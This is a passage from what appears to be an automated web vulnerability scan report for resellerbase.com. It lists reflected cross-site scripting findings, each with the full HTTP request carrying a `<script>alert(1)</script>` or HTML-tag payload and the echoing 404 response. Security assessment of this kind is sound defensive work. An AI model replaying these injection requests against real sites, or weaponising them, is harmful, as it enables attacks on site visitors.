Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 849a8<script>alert(1)</script>647f4b29232 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult849a8<script>alert(1)</script>647f4b29232/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult849a8<script>alert(1)</script>647f4b29232/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.409. http://www.resellerbase.com/adult/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 69906<script>alert(1)</script>6e5c9bb62a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes69906<script>alert(1)</script>6e5c9bb62a8/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes69906<script>alert(1)</script>6e5c9bb62a8/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.410. http://www.resellerbase.com/adult/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e895b<script>alert(1)</script>1fa8dcb1aa5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmose895b<script>alert(1)</script>1fa8dcb1aa5/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmose895b<script>alert(1)</script>1fa8dcb1aa5/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.411. http://www.resellerbase.com/adult/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b72d1<script>alert(1)</script>dac947cd6ec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/imagesb72d1<script>alert(1)</script>dac947cd6ec/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/imagesb72d1<script>alert(1)</script>dac947cd6ec/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.412. http://www.resellerbase.com/adult/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 16ada<script>alert(1)</script>b0c1e4ef207 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/search.php16ada<script>alert(1)</script>b0c1e4ef207?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/search.php16ada<script>alert(1)</script>b0c1e4ef207?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.413. http://www.resellerbase.com/adult/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload c667e<a>ffdf4374588 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchc667e<a>ffdf4374588&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchc667e<a>ffdf4374588&opt=2 was not found on this server.</p>
...[SNIP]...

2.414. http://www.resellerbase.com/adult/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f016d<a>832c4d6e873 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/images/search.php?keyword=search...f016d<a>832c4d6e873&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/search.php?keyword=search...f016d<a>832c4d6e873&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.415. http://www.resellerbase.com/adult/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fe6cf<script>alert(1)</script>3da8c2e6e7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&fe6cf<script>alert(1)</script>3da8c2e6e7d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&fe6cf<script>alert(1)</script>3da8c2e6e7d=1 was not found on this server.</p>
...[SNIP]...

2.416. http://www.resellerbase.com/adult/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7bcd9<a>cf9e38edf5e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=27bcd9<a>cf9e38edf5e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=27bcd9<a>cf9e38edf5e was not found on this server.</p>
...[SNIP]...

2.417. http://www.resellerbase.com/adult/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 584da<script>alert(1)</script>2b34e1b3baa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult584da<script>alert(1)</script>2b34e1b3baa/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult584da<script>alert(1)</script>2b34e1b3baa/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.418. http://www.resellerbase.com/adult/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ed3b4<script>alert(1)</script>ebe8aac9b1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themesed3b4<script>alert(1)</script>ebe8aac9b1e/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themesed3b4<script>alert(1)</script>ebe8aac9b1e/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.419. http://www.resellerbase.com/adult/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b6344<script>alert(1)</script>94b737b70fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmosb6344<script>alert(1)</script>94b737b70fb/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmosb6344<script>alert(1)</script>94b737b70fb/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.420. http://www.resellerbase.com/adult/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 69ea0<script>alert(1)</script>e0b7b0d0e3d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/search.php69ea0<script>alert(1)</script>e0b7b0d0e3d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/search.php69ea0<script>alert(1)</script>e0b7b0d0e3d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.421. http://www.resellerbase.com/adult/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 883c8<a>1040d989e3e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/search.php?keyword=search...&Submit3=Search883c8<a>1040d989e3e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/search.php?keyword=search...&Submit3=Search883c8<a>1040d989e3e&opt=2 was not found on this server.</p>
...[SNIP]...

2.422. http://www.resellerbase.com/adult/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2700f<a>12a09534e32 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/search.php?keyword=search...2700f<a>12a09534e32&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/search.php?keyword=search...2700f<a>12a09534e32&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.423. http://www.resellerbase.com/adult/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8f64f<script>alert(1)</script>be9a70c4364 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&8f64f<script>alert(1)</script>be9a70c4364=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&8f64f<script>alert(1)</script>be9a70c4364=1 was not found on this server.</p>
...[SNIP]...

2.424. http://www.resellerbase.com/adult/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6eab6<a>3711ab04637 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=26eab6<a>3711ab04637 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=26eab6<a>3711ab04637 was not found on this server.</p>
...[SNIP]...

2.425. http://www.resellerbase.com/adult/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7132d<script>alert(1)</script>9c3fb6a5e6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult7132d<script>alert(1)</script>9c3fb6a5e6c/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult7132d<script>alert(1)</script>9c3fb6a5e6c/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.426. http://www.resellerbase.com/adult/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
